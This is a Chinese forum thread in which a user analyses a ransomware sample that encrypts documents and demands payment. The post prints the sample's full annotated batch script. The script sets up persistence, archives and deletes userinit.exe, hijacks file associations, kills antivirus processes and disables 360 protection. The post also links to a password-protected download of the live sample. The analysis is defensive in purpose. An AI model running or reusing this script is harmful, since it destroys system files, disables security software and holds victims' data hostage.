分析一个敲竹杆软件

china-loong

软件打开以后释放文件 修改常用文件打开方式和图标

并加密所有办公格式软件（DOC PDF 表格文件）和TXT文档  并且用RC6加密方式加密  并且每一个加密文件的密码都不同

文件有7200秒时间付款购买  会给你一个序列号  

点击复制会出来一行数字 这个数字是根据随机模式加密  一共有八种加密方式  随机1~8 然后复制一行数字以后再进行某种字节集加密方式加密 得出算法

所有密码保存在内存中 当关闭这个软件或者关机计算机  内存会得到释放  密码自然也没有了

释放出的BAT文件（不知道为什么作者要释放出BAT  为什么不直接加密成EXE文件以后再运行   ）

[Asm] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77

copy %0 "%USERPROFILE%\「开始」菜单\程序\启动\"    复制自身到开机启动 copy %0 "C:\WINDOWS\file.exe"                      复制自身到C盘WINDOWS c:\rar.exe a -ad -k -s -ibck -p[user] "C:\user.rar" "C:\WINDOWS\system32\userinit.exe" 把文件userinit.exe加密            del C:\WINDOWS\system32\userinit.exe /s /f /q     把文件userinit.exe删除 reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F 复制自身到开机启动 reg add  "HKEY_CLASSES_ROOT\DLfile\DefaultIcon" /ve /t REG_EXPAND_SZ /f          创建文件注册表 reg add  "HKEY_CLASSES_ROOT\DLfile\shell\open\command" /ve /t REG_EXPAND_SZ /f reg add  "HKEY_CLASSES_ROOT\DLfile\shell\print\command" /ve /t REG_EXPAND_SZ /f reg add  "HKEY_CLASSES_ROOT\nlsfile\DefaultIcon" /ve /t REG_EXPAND_SZ /f reg add  "HKEY_CLASSES_ROOT\nlsfile\shell\open\command" /ve /t REG_EXPAND_SZ /f reg add  "HKEY_CLASSES_ROOT\nlsfile\shell\print\command" /ve /t REG_EXPAND_SZ /f reg add  "HKEY_CLASSES_ROOT\nlsfile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F    修改文件打开方式为自身 reg add  "HKEY_CLASSES_ROOT\nlsfile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F   修改文件打开方式为自身 reg add  "HKEY_CLASSES_ROOT\nlsfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             修改文件图标为“C:\WINDOWS\XM.ico” reg add  "HKEY_CLASSES_ROOT\DLfile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F     修改文件打开方式为自身 reg add  "HKEY_CLASSES_ROOT\DLfile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F    修改文件打开方式为自身 reg add  "HKEY_CLASSES_ROOT\DLfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F              修改文件图标为“C:\WINDOWS\XM.ico” reg add  "HKEY_CLASSES_ROOT\BMPfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             同上 reg add  "HKEY_CLASSES_ROOT\datfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             同上 reg add  "HKEY_CLASSES_ROOT\inifile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             同上 reg add  "HKEY_CLASSES_ROOT\OLDfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             同上 reg add  "HKEY_CLASSES_ROOT\TMPfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             同上 reg add  "HKEY_CLASSES_ROOT\PRXfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F             同上 reg add  "HKEY_CLASSES_ROOT\inifile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F    修改文件打开方式为自身 reg add  "HKEY_CLASSES_ROOT\inifile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F   修改文件打开方式为自身 reg add  "HKEY_CLASSES_ROOT\scrfile\DefaultIcon" /ve /t REG_EXPAND_SZ /f reg add  "HKEY_CLASSES_ROOT\scrfile\shell\open\command" /ve /t REG_EXPAND_SZ /f reg add  "HKEY_CLASSES_ROOT\scrfile\shell\print\command" /ve /t REG_EXPAND_SZ /f reg add  "HKEY_CLASSES_ROOT\scrfile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F reg add  "HKEY_CLASSES_ROOT\scrfile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F reg add  "HKEY_CLASSES_ROOT\scrfile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F reg add  "HKEY_CLASSES_ROOT\scffile\DefaultIcon" /ve /t REG_EXPAND_SZ /f reg add  "HKEY_CLASSES_ROOT\scffile\shell\open\command" /ve /t REG_EXPAND_SZ /f reg add  "HKEY_CLASSES_ROOT\scffile\shell\print\command" /ve /t REG_EXPAND_SZ /f reg add  "HKEY_CLASSES_ROOT\scffile\shell\open\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F reg add  "HKEY_CLASSES_ROOT\scffile\shell\print\command" /ve /d C:\WINDOWS\file.exe /t REG_SZ /F reg add  "HKEY_CLASSES_ROOT\scffile\DefaultIcon" /ve /d C:\WINDOWS\XM.ico /t REG_SZ /F reg add  "HKEY_CLASSES_ROOT\.lnk" /ve /d DLfile /t REG_SZ /F                             修改文件注册表关联为DLfile reg add  "HKEY_CLASSES_ROOT\.reg" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.jpg" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.wav" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.mp4" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.com" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.avi" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.vod" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.rar" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.scf" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.xls" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.txt" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.zip" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.cmd" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.doc" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.dll" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.log" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.pdf" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.vbs" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.zip" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.rar" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.7z" /ve /d DLfile /t REG_SZ /F                              同上 reg add  "HKEY_CLASSES_ROOT\.nls" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.scr" /ve /d DLfile /t REG_SZ /F                             同上 reg add  "HKEY_CLASSES_ROOT\.scf" /ve /d DLfile /t REG_SZ /F                             同上 taskkill /im Explorer.exe /f       结束桌面进程 ping -n 3 127.0.0.1                等待时间为3秒 explorer.exe                       运行桌面进程（小重启  来刷新注册表服务加载项） taskkill /f /im kavsvc.exe         结束进程 taskkill /f /im KVXP.kxp        结束进程 taskkill /f /im Rav.exe        结束进程 taskkill /f /im Ravmon.exe        结束进程 taskkill /f /im Mcshield.exe        结束进程 taskkill /f /im VsTskMgr.exe        结束进程 taskkill /f /im 360tray.exe        结束进程 reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\ExecAccess\" /ve /d 0 /t REG_SZ /F reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\MonAccess" /ve /d 0 /t REG_SZ /F reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\SiteAccess" /ve /d 0 /t REG_SZ /F reg add  "HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon\UDiskAccess" /ve /d 0 /t REG_SZ /F del %0        删除自身

火眼分析结果：http://fireeye.ijinshan.com/analyse.html?md5=5e3caa6eb2aa2237ff0a6eadfcba48fa&sha1=f89f6a47db7d04c07bbceac24d787f6bb33037e6&type=1#full

样本地址：链接: http://pan.baidu.com/s/1qWVrgoW 密码: b4yg

文件

Size: 993810 bytes

File Version: 1.0.0.0

Modified: 2016年1月21日, 13:15:54

MD5: 6CE3A9B0BAD8B6BFE510D689FD4316C5

SHA1: 8E419C2603CF2DAF9B837ED7C514D2F0F195822A

CRC32: DC397632

大家觉得要如何解决这种敲竹杠？

china-loong

307677814 发表于 2016-1-22 14:21
可能编码导致乱码的，可以转一下编码再用论坛的“代码”来显示，这样是比较直观，图片看得有点晕乎乎的

3Q  已经好了      

北海岁月

我们公司有一台电脑也遇到这种问题，所有文档EXCEL全部加密，弹出窗口要求付款。是通过邮件传染的，现在有办法处理吗！ 给个Q联系

292219828

看得我头都晕了。

520_ai_in@sina.

把样本发出来看看

hxz8998

我去，这也太变态了把！！

违规昵称107

看不懂A

china-loong

520_ai_in@sina. 发表于 2016-1-22 12:33
把样本发出来看看

排版已经从新整理

china-loong

hxz8998 发表于 2016-1-22 12:48
我去，这也太变态了把！！

哪里变态了？

吴尚飞

看得我头都大了。

棉花

马丹 请解释下敲竹杠是啥意思

hxz8998

china-loong 发表于 2016-1-22 13:41
哪里变态了？

我是说这个软件，这样没办法处理把